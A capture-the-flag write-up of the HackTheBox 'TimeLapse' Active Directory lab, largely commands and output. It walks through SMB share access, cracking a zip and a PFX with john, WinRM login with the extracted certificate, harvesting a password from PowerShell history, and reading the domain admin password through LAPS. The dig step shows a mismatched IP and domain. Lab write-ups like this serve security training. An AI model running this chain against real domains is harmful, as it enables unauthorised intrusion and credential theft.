TimeLapse

Easy Windows Active Directory Box on HackTheBox

Reconnaissance

As always we start off by performing a TCP Port scan to enumerate services and versions running on open ports, with the use of Nmap

nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152

# Nmap 7.95 scan initiated Tue Aug  5 11:39:01 2025 as: /usr/lib/nmap/nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up (0.046s latency).
Not shown: 65518 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-08-05 18:39:46Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-08-05T18:41:16+00:00; +7h59m59s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49695/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
|   date: 2025-08-05T18:40:37
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug  5 11:41:17 2025 -- 1 IP address (1 host up) scanned in 135.95 seconds

After reading the scan for a bit we can already know that we're facing a DC (Domain Controller) because of the simultaneously open ports like TCP Port 53 (DNS) TCP Port 88 (Kerberos) TCP Port 135 (RPC) TCP Port 389 (LDAP) ...

We can also see the domain name which is timelapse.htb se we'lld add it to our /etc/hosts file

As I always say when pentesting Active Directory, methodology is the most important so we'll enumerate as much as we can, starting off by TCP Port 53 (DNS) using dig to try and enumerate useful information out of records

dig @10.10.11.35 cicada.htb NS
...
dig @10.10.11.35 cicada.htb MX
...
dig @10.10.11.35 cicada.htb TXT
...
dig @10.10.11.35 cicada.htb AXFR
...

But we don't seem to find anything useful here, so let's move on to port 88 (Kerberos) and let's try to perfrom a user enumeration bruteforce with the tool Kerbrute (Available here)

kerbrute userenum --dc 10.10.11.152 -d timelapse.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 08/05/25 - Ronnie Flathers @ropnop

2025/08/05 12:33:19 >  Using KDC(s):
2025/08/05 12:33:19 >  	10.10.11.152:88

2025/08/05 12:33:22 >  [+] VALID USERNAME:	guest@timelapse.htb
2025/08/05 12:33:30 >  [+] VALID USERNAME:	administrator@timelapse.htb

And we found 2 valid users: Guest and Administrator so let's keep enumerating

Let's go with TCP Port 135 (RPC) now using rpcclient

rpcclient -U 'guest' 10.10.11.152
Password for [WORKGROUP\guest]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 

But we see that our access is denied...

Now let's move on into TCP Port 389 (LDAP) using ldapsearch to enumerate possible useful information with the use of a NULL Session

ldapsearch -x -H ldap://10.10.11.152 -b "dc=timelapse,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=timelapse,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

We don't seem to find anything useful here neither so it's time to enumerate TCP Port 445 (SMB) with the use of NetExec (Newer version of CrackMapExec)

❯ netexec smb 10.10.11.152 -u 'guest' -p '' --shares
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.152    445    DC01             [+] timelapse.htb\guest: 
SMB         10.10.11.152    445    DC01             [*] Enumerated shares
SMB         10.10.11.152    445    DC01             Share           Permissions     Remark
SMB         10.10.11.152    445    DC01             -----           -----------     ------
SMB         10.10.11.152    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.152    445    DC01             C$                              Default share
SMB         10.10.11.152    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.152    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.11.152    445    DC01             Shares          READ            
SMB         10.10.11.152    445    DC01             SYSVOL                          Logon server share 

We see some valid shares and one uncommon share named Shares so let's try to see whats inside using smbclient

smbclient -U 'guest' //10.10.11.152/Shares 

We extracted some files but the ones that catch our attention are winrm_backup.zip and 2 .docx files: LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS_Datasheet.docx

After reading the .docx files for a bit I found nothing useful so let's move on to the zip

Zip Password Cracking

As the zip file asks us for a password we'll try to crack it with zip2john and then john

zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

john --wordlist=/usr/share/seclists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2025-08-05 12:47) 9.090g/s 31650Kp/s 31650Kc/s 31650KC/s swimfan09..sunmoontree
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

And we cracked the passwrd — supremelegacy so let's unzip the file

unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy 
  inflating: legacyy_dev_auth.pfx    

And we found another file: legacyy_dev_auth.pfx

PFX Cracking

And some people may ask, what is a PFX file?

A PFX file, also known as a PKCS#12 file, is a password-protected archive that stores a digital certificate and its corresponding private key

So let's crack it with the use of pfx2john and john

pfx2john legacyy_dev_auth.pfx > hash2.txt

john --wordlist=/usr/share/seclists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:11 DONE (2025-08-05 12:53) 0.08389g/s 271463p/s 271463c/s 271463C/s thuglife03282006..thomasfelton
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

And we found another password — thuglegacy so let's extract the files for legacyy_dev_auth.pfx using openssl

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
Enter Import Password: thuglegacy

❯ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out key.pem
Enter Import Password: thuglegacy

And now we've got both files: the certificate and the key so we'll try and use these to login via WinRM using Evil-WinRM to the user legacyy shown on cert.pem

evil-winrm -i 10.10.11.152 -u legacyy -c cert.pem -k key.pem -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> 

And we're in!

User pivoting

After some manual enumeration we find some useful information in the command line history

*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

such as a valid password — E3R$Q62^12p7PLlC%KWaxuaV and a valid user — svc_deploy so let's try to pivot to this user using evil-winrm as we did earlier with the legacyy user

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

And we successfully pivoted to the svc_deploy user using manual enumeration!

Privilege Escalation — LAPS Abuse

After manual enumeration in this user, we find that it's a strange group — LAPS_Readers

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   10/25/2021 12:25:53 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

so let's find if we can abuse LAPS, but first let's explain this is:

LAPS (Local Administrator Password Solution) is a Microsoft feature that automatically sets a unique, random password for the local Administrator account on each domain-joined computer.

We'll use the following github repository: AdmPwd.PS in order to abuse LAPS we will need to download the whole folder to the victim

# Upload the folder and move to the target directory
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> upload AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop> cd AdmPwd.PS
# Import the module
*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> Import-Module ./AdmPwd.PS.psd1

Now let's aim for DC01 to see if we can retrieve the password

*Evil-WinRM* PS C:\Users\svc_deploy\Desktop\AdmPwd.PS> get-admpwdpassword -computername dc01 | Select password

Password
--------
3H&)(xW48CNE68L9,0,bL0Wo

And we found a valid password!! — 3H&)(xW48CNE68L9,0,bL0Wo

Let's try to login via WinRM using Evil-WinRM

evil-winrm -i 10.10.11.152 -u administrator -p '3H&)(xW48CNE68L9,0,bL0Wo' -S
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And we're in!!! Now we can retrieve the flag and confirm that we Pwned this box completely!!

Hope you found this write-up useful and see you next time!! <3